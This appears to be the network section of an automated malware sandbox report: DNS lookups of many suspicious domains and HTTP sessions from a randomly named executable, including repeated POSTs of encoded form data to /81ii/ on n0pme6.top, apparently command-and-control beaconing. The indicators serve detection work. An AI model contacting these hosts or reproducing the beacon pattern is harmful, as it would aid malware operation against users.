                                                                                                                              Oct 22, 2024 05:40:41.897110939 CEST8050001199.59.243.227192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:41.897182941 CEST5000180192.168.2.6199.59.243.227
                                                                                                                              Oct 22, 2024 05:40:41.909851074 CEST5000180192.168.2.6199.59.243.227
                                                                                                                              Oct 22, 2024 05:40:41.915226936 CEST8050001199.59.243.227192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:42.522188902 CEST8050001199.59.243.227192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:42.522268057 CEST8050001199.59.243.227192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:42.522377014 CEST5000180192.168.2.6199.59.243.227
                                                                                                                              Oct 22, 2024 05:40:42.525343895 CEST8050001199.59.243.227192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:42.525408983 CEST5000180192.168.2.6199.59.243.227
                                                                                                                              Oct 22, 2024 05:40:43.426513910 CEST5000180192.168.2.6199.59.243.227
                                                                                                                              Oct 22, 2024 05:40:44.448899031 CEST5000280192.168.2.6199.59.243.227
                                                                                                                              Oct 22, 2024 05:40:44.454848051 CEST8050002199.59.243.227192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:44.454940081 CEST5000280192.168.2.6199.59.243.227
                                                                                                                              Oct 22, 2024 05:40:44.464335918 CEST5000280192.168.2.6199.59.243.227
                                                                                                                              Oct 22, 2024 05:40:44.469877958 CEST8050002199.59.243.227192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:45.114386082 CEST8050002199.59.243.227192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:45.114456892 CEST8050002199.59.243.227192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:45.120243073 CEST5000280192.168.2.6199.59.243.227
                                                                                                                              Oct 22, 2024 05:40:45.146476984 CEST8050002199.59.243.227192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:45.147664070 CEST5000280192.168.2.6199.59.243.227
                                                                                                                              Oct 22, 2024 05:40:45.973524094 CEST5000280192.168.2.6199.59.243.227
                                                                                                                              Oct 22, 2024 05:40:46.992299080 CEST5000380192.168.2.6199.59.243.227
                                                                                                                              Oct 22, 2024 05:40:46.998198032 CEST8050003199.59.243.227192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:46.999330044 CEST5000380192.168.2.6199.59.243.227
                                                                                                                              Oct 22, 2024 05:40:47.007349014 CEST5000380192.168.2.6199.59.243.227
                                                                                                                              Oct 22, 2024 05:40:47.212471008 CEST8050003199.59.243.227192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:47.213696957 CEST8050003199.59.243.227192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:47.625760078 CEST8050003199.59.243.227192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:47.625823021 CEST8050003199.59.243.227192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:47.625864029 CEST5000380192.168.2.6199.59.243.227
                                                                                                                              Oct 22, 2024 05:40:47.625864983 CEST8050003199.59.243.227192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:47.625919104 CEST5000380192.168.2.6199.59.243.227
                                                                                                                              Oct 22, 2024 05:40:48.520220041 CEST5000380192.168.2.6199.59.243.227
                                                                                                                              Oct 22, 2024 05:40:49.539351940 CEST5000480192.168.2.6199.59.243.227
                                                                                                                              Oct 22, 2024 05:40:49.545170069 CEST8050004199.59.243.227192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:49.548331022 CEST5000480192.168.2.6199.59.243.227
                                                                                                                              Oct 22, 2024 05:40:49.554302931 CEST5000480192.168.2.6199.59.243.227
                                                                                                                              Oct 22, 2024 05:40:49.559715986 CEST8050004199.59.243.227192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:50.204662085 CEST8050004199.59.243.227192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:50.204727888 CEST8050004199.59.243.227192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:50.204838037 CEST5000480192.168.2.6199.59.243.227
                                                                                                                              Oct 22, 2024 05:40:50.236541033 CEST8050004199.59.243.227192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:50.236998081 CEST5000480192.168.2.6199.59.243.227
                                                                                                                              Oct 22, 2024 05:40:50.237590075 CEST5000480192.168.2.6199.59.243.227
                                                                                                                              Oct 22, 2024 05:40:50.242974997 CEST8050004199.59.243.227192.168.2.6
                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Oct 22, 2024 05:38:34.187200069 CEST4949653192.168.2.61.1.1.1
                                                                                                                              Oct 22, 2024 05:38:34.413352966 CEST53494961.1.1.1192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:51.540106058 CEST5301153192.168.2.61.1.1.1
                                                                                                                              Oct 22, 2024 05:38:52.124327898 CEST53530111.1.1.1192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:13.273544073 CEST5947053192.168.2.61.1.1.1
                                                                                                                              Oct 22, 2024 05:39:13.355920076 CEST53594701.1.1.1192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:26.993957996 CEST6060853192.168.2.61.1.1.1
                                                                                                                              Oct 22, 2024 05:39:27.077936888 CEST53606081.1.1.1192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:40.712183952 CEST5941453192.168.2.61.1.1.1
                                                                                                                              Oct 22, 2024 05:39:41.063884974 CEST53594141.1.1.1192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:59.461600065 CEST6120553192.168.2.61.1.1.1
                                                                                                                              Oct 22, 2024 05:39:59.528155088 CEST53612051.1.1.1192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:12.820202112 CEST5810253192.168.2.61.1.1.1
                                                                                                                              Oct 22, 2024 05:40:12.834736109 CEST53581021.1.1.1192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:26.226530075 CEST6048253192.168.2.61.1.1.1
                                                                                                                              Oct 22, 2024 05:40:27.224221945 CEST6048253192.168.2.61.1.1.1
                                                                                                                              Oct 22, 2024 05:40:27.521277905 CEST53604821.1.1.1192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:27.521295071 CEST53604821.1.1.1192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:41.820821047 CEST5092453192.168.2.61.1.1.1
                                                                                                                              Oct 22, 2024 05:40:41.888761997 CEST53509241.1.1.1192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:55.243583918 CEST6495453192.168.2.61.1.1.1
                                                                                                                              Oct 22, 2024 05:40:55.251979113 CEST53649541.1.1.1192.168.2.6
                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                              Oct 22, 2024 05:38:34.187200069 CEST192.168.2.61.1.1.10x74c5Standard query (0)www.crochetpets.onlineA (IP address)IN (0x0001)false
                                                                                                                              Oct 22, 2024 05:38:51.540106058 CEST192.168.2.61.1.1.10x33eaStandard query (0)www.n0pme6.topA (IP address)IN (0x0001)false
                                                                                                                              Oct 22, 2024 05:39:13.273544073 CEST192.168.2.61.1.1.10x576aStandard query (0)www.kovallo.cloudA (IP address)IN (0x0001)false
                                                                                                                              Oct 22, 2024 05:39:26.993957996 CEST192.168.2.61.1.1.10x2ef2Standard query (0)www.hentaistgma.netA (IP address)IN (0x0001)false
                                                                                                                              Oct 22, 2024 05:39:40.712183952 CEST192.168.2.61.1.1.10x775eStandard query (0)www.ngmr.xyzA (IP address)IN (0x0001)false
                                                                                                                              Oct 22, 2024 05:39:59.461600065 CEST192.168.2.61.1.1.10x78c8Standard query (0)www.polarmuseum.infoA (IP address)IN (0x0001)false
                                                                                                                              Oct 22, 2024 05:40:12.820202112 CEST192.168.2.61.1.1.10x407aStandard query (0)www.tophcom.onlineA (IP address)IN (0x0001)false
                                                                                                                              Oct 22, 2024 05:40:26.226530075 CEST192.168.2.61.1.1.10x8be5Standard query (0)www.inf30027group23.xyzA (IP address)IN (0x0001)false
                                                                                                                              Oct 22, 2024 05:40:27.224221945 CEST192.168.2.61.1.1.10x8be5Standard query (0)www.inf30027group23.xyzA (IP address)IN (0x0001)false
                                                                                                                              Oct 22, 2024 05:40:41.820821047 CEST192.168.2.61.1.1.10xf1d0Standard query (0)www.donante-de-ovulos.bizA (IP address)IN (0x0001)false
                                                                                                                              Oct 22, 2024 05:40:55.243583918 CEST192.168.2.61.1.1.10xaa04Standard query (0)www.shopdj00.xyzA (IP address)IN (0x0001)false
                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                              Oct 22, 2024 05:38:34.413352966 CEST1.1.1.1192.168.2.60x74c5No error (0)www.crochetpets.online208.91.197.27A (IP address)IN (0x0001)false
                                                                                                                              Oct 22, 2024 05:38:52.124327898 CEST1.1.1.1192.168.2.60x33eaNo error (0)www.n0pme6.top198.44.251.203A (IP address)IN (0x0001)false
                                                                                                                              Oct 22, 2024 05:38:52.124327898 CEST1.1.1.1192.168.2.60x33eaNo error (0)www.n0pme6.top198.44.251.51A (IP address)IN (0x0001)false
                                                                                                                              Oct 22, 2024 05:39:13.355920076 CEST1.1.1.1192.168.2.60x576aNo error (0)www.kovallo.cloudkovallo.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Oct 22, 2024 05:39:13.355920076 CEST1.1.1.1192.168.2.60x576aNo error (0)kovallo.cloud81.2.196.19A (IP address)IN (0x0001)false
                                                                                                                              Oct 22, 2024 05:39:27.077936888 CEST1.1.1.1192.168.2.60x2ef2No error (0)www.hentaistgma.nethentaistgma.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Oct 22, 2024 05:39:27.077936888 CEST1.1.1.1192.168.2.60x2ef2No error (0)hentaistgma.net195.110.124.133A (IP address)IN (0x0001)false
                                                                                                                              Oct 22, 2024 05:39:41.063884974 CEST1.1.1.1192.168.2.60x775eNo error (0)www.ngmr.xyz54.67.87.110A (IP address)IN (0x0001)false
                                                                                                                              Oct 22, 2024 05:39:59.528155088 CEST1.1.1.1192.168.2.60x78c8No error (0)www.polarmuseum.info199.59.243.227A (IP address)IN (0x0001)false
                                                                                                                              Oct 22, 2024 05:40:12.834736109 CEST1.1.1.1192.168.2.60x407aNo error (0)www.tophcom.online162.213.249.216A (IP address)IN (0x0001)false
                                                                                                                              Oct 22, 2024 05:40:27.521277905 CEST1.1.1.1192.168.2.60x8be5No error (0)www.inf30027group23.xyzinf30027group23.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Oct 22, 2024 05:40:27.521277905 CEST1.1.1.1192.168.2.60x8be5No error (0)inf30027group23.xyz221.121.144.149A (IP address)IN (0x0001)false
                                                                                                                              Oct 22, 2024 05:40:27.521295071 CEST1.1.1.1192.168.2.60x8be5No error (0)www.inf30027group23.xyzinf30027group23.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Oct 22, 2024 05:40:27.521295071 CEST1.1.1.1192.168.2.60x8be5No error (0)inf30027group23.xyz221.121.144.149A (IP address)IN (0x0001)false
                                                                                                                              Oct 22, 2024 05:40:41.888761997 CEST1.1.1.1192.168.2.60xf1d0No error (0)www.donante-de-ovulos.biz199.59.243.227A (IP address)IN (0x0001)false
                                                                                                                              Oct 22, 2024 05:40:55.251979113 CEST1.1.1.1192.168.2.60xaa04Server failure (2)www.shopdj00.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                              • www.crochetpets.online
                                                                                                                              • www.n0pme6.top
                                                                                                                              • www.kovallo.cloud
                                                                                                                              • www.hentaistgma.net
                                                                                                                              • www.ngmr.xyz
                                                                                                                              • www.polarmuseum.info
                                                                                                                              • www.tophcom.online
                                                                                                                              • www.inf30027group23.xyz
                                                                                                                              • www.donante-de-ovulos.biz
                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              0192.168.2.649868208.91.197.27805776C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 22, 2024 05:38:34.431626081 CEST412OUTGET /y9rm/?kT9p=HEdRnjuxtNGVPFRX3NZ2CbxO5KjoR5mZP9Y7+HX2gpvgKHiu4zeqhoni6TAVjjgJNor6P4ykumohRwGjoGuDnTy/l81TemUdGivRuw5GfSiykvy81pD0xLcKVnn388uSWX5E4Mc=&in1Hf=rx3dZnMxlRvDbR HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Host: www.crochetpets.online
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
                                                                                                                              Oct 22, 2024 05:38:36.186935902 CEST1236INHTTP/1.1 200 OK
                                                                                                                              Date: Tue, 22 Oct 2024 03:38:34 GMT
                                                                                                                              Server: Apache
                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                              Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                              Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_Qtc2gea7bvuwoSl9gQZa+EBHn/6zJ8NP3eci0sVDl8/E32W9tmMmFZq54YSg0GQ/KFtWVsPvINJV6/8ddwXYdA==
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Connection: close
                                                                                                                              Data Raw: 39 65 64 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e 69 66 72 61 6d 65 20 3d 20 74 72 75 65 3b 20 69 66 28 [TRUNCATED]
                                                                                                                              Data Ascii: 9edc<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprApp
                                                                                                                              Oct 22, 2024 05:38:36.186949015 CEST110INData Raw: 6c 69 65 73 47 6c 6f 62 61 6c 6c 79 3d 74 72 75 65 7d 69 66 28 21 28 22 63 6d 70 5f 69 64 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64 3c 31 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64 3d 30 7d 69 66 28 21 28
                                                                                                                              Data Ascii: liesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){windo
                                                                                                                              Oct 22, 2024 05:38:36.186959982 CEST1236INData Raw: 77 2e 63 6d 70 5f 63 64 69 64 3d 22 32 31 66 64 63 61 32 32 38 31 38 33 33 22 7d 69 66 28 21 28 22 63 6d 70 5f 70 61 72 61 6d 73 22 20 69 6e 20 77 69 6e 64 6f 77 29 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 70 61 72 61 6d 73 3d 22 22 7d 69 66 28 21
                                                                                                                              Data Ascii: w.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in window)){window.cmp_host="a.delivery.consentmanager.net"}if(!("cmp_cdn" in window)){window.cmp_cdn="cdn.consentmanager.net"}if(!("cmp_proto" in wi
                                                                                                                              Oct 22, 2024 05:38:36.186992884 CEST146INData Raw: 3f 6e 61 76 69 67 61 74 6f 72 2e 6c 61 6e 67 75 61 67 65 73 3a 5b 5d 3b 69 66 28 66 2e 69 6e 64 65 78 4f 66 28 22 63 6d 70 6c 61 6e 67 3d 22 29 21 3d 2d 31 29 7b 63 2e 70 75 73 68 28 66 2e 73 75 62 73 74 72 28 66 2e 69 6e 64 65 78 4f 66 28 22 63
                                                                                                                              Data Ascii: ?navigator.languages:[];if(f.indexOf("cmplang=")!=-1){c.push(f.substr(f.indexOf("cmplang=")+8,2).toUpperCase())}else{if(e.indexOf("cmplang=")!=-1)
                                                                                                                              Oct 22, 2024 05:38:36.194205999 CEST1236INData Raw: 7b 63 2e 70 75 73 68 28 65 2e 73 75 62 73 74 72 28 65 2e 69 6e 64 65 78 4f 66 28 22 63 6d 70 6c 61 6e 67 3d 22 29 2b 38 2c 32 29 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 29 7d 65 6c 73 65 7b 69 66 28 22 63 6d 70 5f 73 65 74 6c 61 6e 67 22 20 69
                                                                                                                              Data Ascii: {c.push(e.substr(e.indexOf("cmplang=")+8,2).toUpperCase())}else{if("cmp_setlang" in window&&window.cmp_setlang!=""){c.push(window.cmp_setlang.toUpperCase())}else{if(a.length>0){for(var d=0;d<a.length;d++){c.push(a[d])}}}}}if("language" in navi
                                                                                                                              Oct 22, 2024 05:38:36.194216013 CEST146INData Raw: 30 2c 77 2e 69 6e 64 65 78 4f 66 28 22 26 22 29 29 7d 72 65 74 75 72 6e 20 77 7d 76 61 72 20 6b 3d 28 22 63 6d 70 5f 70 72 6f 74 6f 22 20 69 6e 20 68 29 3f 68 2e 63 6d 70 5f 70 72 6f 74 6f 3a 22 68 74 74 70 73 3a 22 3b 69 66 28 6b 21 3d 22 68 74
                                                                                                                              Data Ascii: 0,w.indexOf("&"))}return w}var k=("cmp_proto" in h)?h.cmp_proto:"https:";if(k!="http:"&&k!="https:"){k="https:"}var g=("cmp_ref" in h)?h.cmp_ref:l
                                                                                                                              Oct 22, 2024 05:38:36.194470882 CEST1236INData Raw: 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3b 76 61 72 20 6a 3d 75 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 6a 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 63 6d 70 2d 61 62 22 2c 22 31 22 29 3b 76 61 72
                                                                                                                              Data Ascii: ocation.href;var j=u.createElement("script");j.setAttribute("data-cmp-ab","1");var c=x("cmpdesign","cmp_design" in h?h.cmp_design:"");var f=x("cmpregulationkey","cmp_regulationkey" in h?h.cmp_regulationkey:"");var r=x("cmpgppkey","cmp_gppkey"
                                                                                                                              Oct 22, 2024 05:38:36.194482088 CEST1236INData Raw: 62 75 67 75 6e 6d 69 6e 69 6d 69 7a 65 64 3a 30 29 3e 30 3f 22 22 3a 22 2e 6d 69 6e 22 3b 76 61 72 20 61 3d 78 28 22 63 6d 70 64 65 62 75 67 63 6f 76 65 72 61 67 65 22 2c 22 63 6d 70 5f 64 65 62 75 67 63 6f 76 65 72 61 67 65 22 20 69 6e 20 68 3f
                                                                                                                              Data Ascii: bugunminimized:0)>0?"":".min";var a=x("cmpdebugcoverage","cmp_debugcoverage" in h?h.cmp_debugcoverage:"");if(a=="1"){m="instrumented";p=""}var j=u.createElement("script");j.src=k+"//"+h.cmp_cdn+"/delivery/"+m+"/cmp"+b+p+".js";j.type="text/java
                                                                                                                              Oct 22, 2024 05:38:36.194490910 CEST292INData Raw: 29 7b 62 3d 62 2e 73 75 62 73 74 72 28 31 2c 62 2e 6c 65 6e 67 74 68 29 7d 76 61 72 20 67 3d 62 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 62 2e 69 6e 64 65 78 4f 66 28 22 3d 22 29 29 3b 69 66 28 62 2e 69 6e 64 65 78 4f 66 28 22 3b 22 29 21 3d 2d 31
                                                                                                                              Data Ascii: ){b=b.substr(1,b.length)}var g=b.substring(0,b.indexOf("="));if(b.indexOf(";")!=-1){var c=b.substring(b.indexOf("=")+1,b.indexOf(";"))}else{var c=b.substr(b.indexOf("=")+1,b.length)}if(h==g){f=c}var e=b.indexOf(";")+1;if(e==0){e=b.length}b=b.s
                                                                                                                              Oct 22, 2024 05:38:36.201793909 CEST1236INData Raw: 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 61 72 67 75 6d 65 6e 74 73 3b 5f 5f 63 6d 70 2e 61 3d 5f 5f 63 6d 70 2e 61 7c 7c 5b 5d 3b 69 66 28 21 61 2e 6c 65 6e 67 74 68 29 7b 72 65 74 75 72 6e 20 5f 5f 63 6d 70 2e 61 7d 65 6c 73 65 7b 69 66
                                                                                                                              Data Ascii: unction(){var a=arguments;__cmp.a=__cmp.a||[];if(!a.length){return __cmp.a}else{if(a[0]==="ping"){if(a[1]===2){a[2]({gdprApplies:gdprAppliesGlobally,cmpLoaded:false,cmpStatus:"stub",displayStatus:"hidden",apiVersion:"2.2",cmpId:31},true)}else{
                                                                                                                              Oct 22, 2024 05:38:36.201805115 CEST146INData Raw: 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 29 7b 76 61 72 20 68 3d 66 61 6c 73 65 3b 5f 5f 67 70 70 2e 65 3d 5f 5f 67 70 70 2e 65 7c 7c 5b 5d 3b 66 6f 72 28 76 61 72 20 64 3d 30 3b 64 3c 5f 5f 67 70 70 2e 65 2e 6c 65 6e 67 74 68
                                                                                                                              Data Ascii: removeEventListener"){var h=false;__gpp.e=__gpp.e||[];for(var d=0;d<__gpp.e.length;d++){if(__gpp.e[d].id==e){__gpp.e[d].splice(d,1);h=true;break}}


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              1192.168.2.649962198.44.251.203805776C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 22, 2024 05:38:52.140813112 CEST647OUTPOST /81ii/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Host: www.n0pme6.top
                                                                                                                              Origin: http://www.n0pme6.top
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Length: 209
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.n0pme6.top/81ii/
                                                                                                                              User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
                                                                                                                              Data Raw: 6b 54 39 70 3d 76 47 77 4f 4a 33 78 42 46 48 33 4d 30 59 6e 2f 54 54 41 45 47 59 6d 54 42 56 53 4c 6e 6f 50 42 4a 62 65 4a 68 41 41 36 4f 6a 4d 48 5a 4f 30 5a 77 43 4b 64 42 49 39 7a 50 30 34 33 77 32 54 59 34 32 43 2b 2b 55 49 59 44 33 6a 5a 42 63 45 51 73 7a 4c 74 55 2f 43 68 38 59 66 2b 65 66 76 39 50 76 4a 46 71 2f 62 37 4a 32 45 48 2f 70 62 4c 61 42 54 41 54 66 33 6a 43 4d 64 2f 75 72 41 4b 63 49 64 6e 51 36 57 44 4e 67 75 54 6f 4c 37 2f 7a 6a 4b 74 79 38 4a 4f 36 51 4d 46 71 53 6e 47 52 6b 51 69 72 63 61 43 35 33 63 74 48 49 66 73 4c 43 4e 4f 53 61 33 63 53 6b 4a 74 50 67 46 39 75 4d 4d 4b 6e 77 4e 74 71 46 77 6c
                                                                                                                              Data Ascii: kT9p=vGwOJ3xBFH3M0Yn/TTAEGYmTBVSLnoPBJbeJhAA6OjMHZO0ZwCKdBI9zP043w2TY42C++UIYD3jZBcEQszLtU/Ch8Yf+efv9PvJFq/b7J2EH/pbLaBTATf3jCMd/urAKcIdnQ6WDNguToL7/zjKty8JO6QMFqSnGRkQircaC53ctHIfsLCNOSa3cSkJtPgF9uMMKnwNtqFwl


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              2192.168.2.649973198.44.251.203805776C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 22, 2024 05:38:54.683263063 CEST671OUTPOST /81ii/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Host: www.n0pme6.top
                                                                                                                              Origin: http://www.n0pme6.top
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Length: 233
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.n0pme6.top/81ii/
                                                                                                                              User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
                                                                                                                              Data Raw: 6b 54 39 70 3d 76 47 77 4f 4a 33 78 42 46 48 33 4d 32 34 33 2f 51 77 59 45 52 6f 6d 55 4d 46 53 4c 74 49 50 46 4a 62 53 4a 68 43 73 71 4e 52 59 48 58 50 45 5a 7a 42 53 64 43 49 39 7a 58 45 34 79 74 6d 54 54 34 32 65 4d 2b 51 4d 59 44 33 33 5a 42 64 30 51 73 41 54 79 4f 50 43 6a 30 34 66 38 51 2f 76 39 50 76 4a 46 71 2f 50 52 4a 32 4d 48 6a 49 72 4c 62 6b 6e 66 4e 76 33 67 53 63 64 2f 6c 4c 41 4f 63 49 64 5a 51 37 4c 73 4e 6d 71 54 6f 4b 6e 2f 7a 79 4b 69 34 38 4a 79 30 77 4e 48 70 53 47 52 63 46 39 41 6b 50 48 68 76 58 31 4e 47 2b 65 32 58 78 4e 74 41 4b 58 65 53 6d 52 66 50 41 46 58 73 4d 30 4b 31 6e 42 4b 6c 78 56 47 73 49 71 74 62 51 4c 71 2b 53 71 37 61 42 35 6c 52 35 6c 71 44 51 3d 3d
                                                                                                                              Data Ascii: kT9p=vGwOJ3xBFH3M243/QwYERomUMFSLtIPFJbSJhCsqNRYHXPEZzBSdCI9zXE4ytmTT42eM+QMYD33ZBd0QsATyOPCj04f8Q/v9PvJFq/PRJ2MHjIrLbknfNv3gScd/lLAOcIdZQ7LsNmqToKn/zyKi48Jy0wNHpSGRcF9AkPHhvX1NG+e2XxNtAKXeSmRfPAFXsM0K1nBKlxVGsIqtbQLq+Sq7aB5lR5lqDQ==


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              3192.168.2.649974198.44.251.203805776C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 22, 2024 05:38:57.229672909 CEST1684OUTPOST /81ii/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Host: www.n0pme6.top
                                                                                                                              Origin: http://www.n0pme6.top
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Length: 1245
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.n0pme6.top/81ii/
                                                                                                                              User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
